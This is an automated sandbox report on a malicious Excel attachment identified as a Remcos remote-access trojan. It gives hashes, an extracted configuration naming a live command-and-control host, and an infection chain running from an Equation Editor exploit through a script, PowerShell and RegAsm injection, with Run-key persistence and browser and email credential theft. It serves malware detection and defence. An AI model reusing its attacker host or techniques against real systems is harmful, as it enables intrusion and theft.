remcos | fd363c89da6fb751baac4db6bc4d1cc302c88e1efeba1bfab397a627d4c1eead

Analysis

max time kernel
150s
max time network
145s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
16-04-2024 15:32

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

OFFER DETAIL 75645.xls
Size

319KB
MD5

1dc1fa973594e14e2b517f281400941f
SHA1

1565eb8c6dc5248ecd19cfe4ff1cb6c33541ed1e
SHA256

fd363c89da6fb751baac4db6bc4d1cc302c88e1efeba1bfab397a627d4c1eead
SHA512

90e146ad9faa2acc760511fbdeed8c6883bbb274a158349ac995714709d77374789f77454e1bb818477274e0c60eb90684bcad3da3daa46f9d558861cf307669
SSDEEP

6144:xLunJatY35qAOJl/YrLYz+WrNhZF+E+fgL+0dD8ivSbVX2MIMflDClBnPlWjIKw8:xmJaU3bVX2MIuVC7ntWjIKN

Score

10^/10

remcos remotehost collection persistence rat spyware stealer

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

ezege.duckdns.org:14645

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-IVESQI
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos

NirSoft MailPassView 3 IoCs

Password recovery tool for various email clients

Processes:

resource	yara_rule
behavioral1/memory/332-292-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView
behavioral1/memory/332-296-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView
behavioral1/memory/332-313-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView

NirSoft WebBrowserPassView 3 IoCs

Password recovery tool for various web browsers

Processes:

resource	yara_rule
behavioral1/memory/740-287-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView
behavioral1/memory/740-288-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView
behavioral1/memory/740-304-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView

Nirsoft 10 IoCs

Processes:

resource	yara_rule
behavioral1/memory/740-287-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft
behavioral1/memory/332-292-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft
behavioral1/memory/740-288-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft
behavioral1/memory/1460-297-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft
behavioral1/memory/1460-298-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft
behavioral1/memory/1460-299-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft
behavioral1/memory/332-296-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft
behavioral1/memory/1460-295-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft
behavioral1/memory/740-304-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft
behavioral1/memory/332-313-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft

Blocklisted process makes network request 6 IoCs

Processes:

EQNEDT32.EXEWScript.exepowershell.exe

flow pid process

17 1280 EQNEDT32.EXE
20 784 WScript.exe
22 1816 powershell.exe
24 1816 powershell.exe
26 1816 powershell.exe
27 1816 powershell.exe
Abuses OpenXML format to download file from external location
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

flow	pid	process
17	1280	EQNEDT32.EXE
20	784	WScript.exe
22	1816	powershell.exe
24	1816	powershell.exe
26	1816	powershell.exe
27	1816	powershell.exe

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs

collection

Email Collection

T1114

Processes:

RegAsm.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	RegAsm.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

powershell.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000\Software\Microsoft\Windows\CurrentVersion\Run\Path = "C:\\ProgramData\\CCHN.vbs"	powershell.exe

Drops file in System32 directory 3 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 4 IoCs

Processes:

powershell.exeRegAsm.exe

description	pid	process	target process
PID 1816 set thread context of 1784	1816	powershell.exe	RegAsm.exe
PID 1784 set thread context of 740	1784	RegAsm.exe	RegAsm.exe
PID 1784 set thread context of 332	1784	RegAsm.exe	RegAsm.exe
PID 1784 set thread context of 1460	1784	RegAsm.exe	RegAsm.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Office loads VBA resources, possible macro or embedded object present
Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry
T1012

System Information Discovery
T1082

Processes:

EXCEL.EXE

description ioc process

Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE
Launches Equation Editor 1 TTPs 1 IoCs
Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.
exploit

Exploitation for Client Execution
T1203

Processes:

EQNEDT32.EXE

pid process

1280 EQNEDT32.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE

pid	process
1280	EQNEDT32.EXE

Modifies Internet Explorer settings 1 TTPs 31 IoCs

adware spyware

Modify Registry

T1112

Processes:

WINWORD.EXEEXCEL.EXE

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit"	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell	WINWORD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000\Software\Microsoft\Internet Explorer\Toolbar	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000\Software\Microsoft\Internet Explorer\MenuExt	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"	EXCEL.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit	WINWORD.EXE

Modifies registry class 64 IoCs

Processes:

WINWORD.EXE

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\ = "&Open"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" /p %1"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\ = "[open(\"%1\")]"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\ = "[open(\"%1\")]"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\14\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" %1"	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ = "&Open"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\application	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon\ = "\"%1\""	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\14	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ = "&Open"	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\topic	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohevi.dll"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\application	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\ShellEx	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic\ = "system"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\application\ = "Excel"	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\ = "&Open"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" /p %1"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\ = "&Open"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\ = "&Edit"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\ = "&Open"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\ = "&Open"	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

EXCEL.EXE

pid process

2204 EXCEL.EXE
Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

powershell.exepowershell.exepowershell.exeRegAsm.exe

pid process

1160 powershell.exe
1816 powershell.exe
2640 powershell.exe
740 RegAsm.exe
740 RegAsm.exe
Suspicious behavior: MapViewOfSection 4 IoCs

Processes:

RegAsm.exe

pid process

1784 RegAsm.exe
1784 RegAsm.exe
1784 RegAsm.exe
1784 RegAsm.exe

pid	process
2204	EXCEL.EXE

pid	process
1160	powershell.exe
1816	powershell.exe
2640	powershell.exe
740	RegAsm.exe
740	RegAsm.exe

pid	process
1784	RegAsm.exe
1784	RegAsm.exe
1784	RegAsm.exe
1784	RegAsm.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

powershell.exepowershell.exepowershell.exeRegAsm.exe

description	pid	process
Token: SeDebugPrivilege	1160	powershell.exe
Token: SeDebugPrivilege	1816	powershell.exe
Token: SeDebugPrivilege	2640	powershell.exe
Token: SeDebugPrivilege	1460	RegAsm.exe

Suspicious use of SetWindowsHookEx 5 IoCs

Processes:

EXCEL.EXEWINWORD.EXE

pid process

2204 EXCEL.EXE
2204 EXCEL.EXE
2204 EXCEL.EXE
2788 WINWORD.EXE
2788 WINWORD.EXE

pid	process
2204	EXCEL.EXE
2204	EXCEL.EXE
2204	EXCEL.EXE
2788	WINWORD.EXE
2788	WINWORD.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

EQNEDT32.EXEWINWORD.EXEWScript.exepowershell.exepowershell.exeRegAsm.exe

description	pid	process	target process
PID 1280 wrote to memory of 784	1280	EQNEDT32.EXE	WScript.exe
PID 1280 wrote to memory of 784	1280	EQNEDT32.EXE	WScript.exe
PID 1280 wrote to memory of 784	1280	EQNEDT32.EXE	WScript.exe
PID 1280 wrote to memory of 784	1280	EQNEDT32.EXE	WScript.exe
PID 2788 wrote to memory of 1740	2788	WINWORD.EXE	splwow64.exe
PID 2788 wrote to memory of 1740	2788	WINWORD.EXE	splwow64.exe
PID 2788 wrote to memory of 1740	2788	WINWORD.EXE	splwow64.exe
PID 2788 wrote to memory of 1740	2788	WINWORD.EXE	splwow64.exe
PID 784 wrote to memory of 1160	784	WScript.exe	powershell.exe
PID 784 wrote to memory of 1160	784	WScript.exe	powershell.exe
PID 784 wrote to memory of 1160	784	WScript.exe	powershell.exe
PID 784 wrote to memory of 1160	784	WScript.exe	powershell.exe
PID 1160 wrote to memory of 1816	1160	powershell.exe	powershell.exe
PID 1160 wrote to memory of 1816	1160	powershell.exe	powershell.exe
PID 1160 wrote to memory of 1816	1160	powershell.exe	powershell.exe
PID 1160 wrote to memory of 1816	1160	powershell.exe	powershell.exe
PID 1816 wrote to memory of 2640	1816	powershell.exe	powershell.exe
PID 1816 wrote to memory of 2640	1816	powershell.exe	powershell.exe
PID 1816 wrote to memory of 2640	1816	powershell.exe	powershell.exe
PID 1816 wrote to memory of 2640	1816	powershell.exe	powershell.exe
PID 1816 wrote to memory of 1784	1816	powershell.exe	RegAsm.exe
PID 1816 wrote to memory of 1784	1816	powershell.exe	RegAsm.exe
PID 1816 wrote to memory of 1784	1816	powershell.exe	RegAsm.exe
PID 1816 wrote to memory of 1784	1816	powershell.exe	RegAsm.exe
PID 1816 wrote to memory of 1784	1816	powershell.exe	RegAsm.exe
PID 1816 wrote to memory of 1784	1816	powershell.exe	RegAsm.exe
PID 1816 wrote to memory of 1784	1816	powershell.exe	RegAsm.exe
PID 1816 wrote to memory of 1784	1816	powershell.exe	RegAsm.exe
PID 1816 wrote to memory of 1784	1816	powershell.exe	RegAsm.exe
PID 1816 wrote to memory of 1784	1816	powershell.exe	RegAsm.exe
PID 1816 wrote to memory of 1784	1816	powershell.exe	RegAsm.exe
PID 1816 wrote to memory of 1784	1816	powershell.exe	RegAsm.exe
PID 1816 wrote to memory of 1784	1816	powershell.exe	RegAsm.exe
PID 1816 wrote to memory of 1784	1816	powershell.exe	RegAsm.exe
PID 1816 wrote to memory of 1784	1816	powershell.exe	RegAsm.exe
PID 1816 wrote to memory of 1784	1816	powershell.exe	RegAsm.exe
PID 1784 wrote to memory of 740	1784	RegAsm.exe	RegAsm.exe
PID 1784 wrote to memory of 740	1784	RegAsm.exe	RegAsm.exe
PID 1784 wrote to memory of 740	1784	RegAsm.exe	RegAsm.exe
PID 1784 wrote to memory of 740	1784	RegAsm.exe	RegAsm.exe
PID 1784 wrote to memory of 740	1784	RegAsm.exe	RegAsm.exe
PID 1784 wrote to memory of 740	1784	RegAsm.exe	RegAsm.exe
PID 1784 wrote to memory of 740	1784	RegAsm.exe	RegAsm.exe
PID 1784 wrote to memory of 740	1784	RegAsm.exe	RegAsm.exe
PID 1784 wrote to memory of 1044	1784	RegAsm.exe	RegAsm.exe
PID 1784 wrote to memory of 1044	1784	RegAsm.exe	RegAsm.exe
PID 1784 wrote to memory of 1044	1784	RegAsm.exe	RegAsm.exe
PID 1784 wrote to memory of 1044	1784	RegAsm.exe	RegAsm.exe
PID 1784 wrote to memory of 1044	1784	RegAsm.exe	RegAsm.exe
PID 1784 wrote to memory of 1044	1784	RegAsm.exe	RegAsm.exe
PID 1784 wrote to memory of 1044	1784	RegAsm.exe	RegAsm.exe
PID 1784 wrote to memory of 332	1784	RegAsm.exe	RegAsm.exe
PID 1784 wrote to memory of 332	1784	RegAsm.exe	RegAsm.exe
PID 1784 wrote to memory of 332	1784	RegAsm.exe	RegAsm.exe
PID 1784 wrote to memory of 332	1784	RegAsm.exe	RegAsm.exe
PID 1784 wrote to memory of 332	1784	RegAsm.exe	RegAsm.exe
PID 1784 wrote to memory of 332	1784	RegAsm.exe	RegAsm.exe
PID 1784 wrote to memory of 332	1784	RegAsm.exe	RegAsm.exe
PID 1784 wrote to memory of 332	1784	RegAsm.exe	RegAsm.exe
PID 1784 wrote to memory of 1460	1784	RegAsm.exe	RegAsm.exe
PID 1784 wrote to memory of 1460	1784	RegAsm.exe	RegAsm.exe
PID 1784 wrote to memory of 1460	1784	RegAsm.exe	RegAsm.exe
PID 1784 wrote to memory of 1460	1784	RegAsm.exe	RegAsm.exe
PID 1784 wrote to memory of 1460	1784	RegAsm.exe	RegAsm.exe

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\OFFER DETAIL 75645.xls"
1⤵
- Enumerates system info in registry
- Modifies Internet Explorer settings
- Suspicious behavior: AddClipboardFormatListener
